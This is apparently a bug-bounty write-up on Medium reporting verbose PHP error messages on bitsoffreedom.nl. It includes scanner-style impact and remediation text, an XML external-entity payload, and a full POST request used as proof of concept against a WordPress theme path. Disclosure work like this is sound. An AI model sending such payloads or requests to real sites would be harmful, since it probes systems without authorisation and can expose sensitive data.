Programming Error Message detected

These error messages were only partially disabled. Because there could be sensitive information in those error messages, we have now completely disabled the display of error messages.

The application displays detailed error messages when unhandled PHP exceptions occur.
Detailed technical error messages can allow an adversary to gain information about the application and database that could be used to conduct further attacks.The following expressions were matched in the HTTP response

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. Source code, stack trace, etc. data may be disclosed.

Remediation

Do not provide error messages on production environments. Save error messages with a reference number to a backend storage such as a log, text file or database, then show this number and a static user-friendly error message to the user.

payload =>

<?xml version=”1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM “data:;base64,TlM3NzU0NTYxNDQ2NTc1”>]><ns>&lfi;</ns>

POC

POST /wp-content/themes/bitsoffreedom/ HTTP/1.1

Host: www.bitsoffreedom.nl

Cache-Control: no-cache

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Length: 124

Content-Type: application/xml

<?xml version=”1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM “data:;base64,TlM3NzU0NTYxNDQ2NTc1”>]><ns>&lfi;</ns>

and I Acknowledge for this bug

#bugbounty

Blogger | Security Researcher | Digital forensic analyst | Twitter — @mrunal110

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store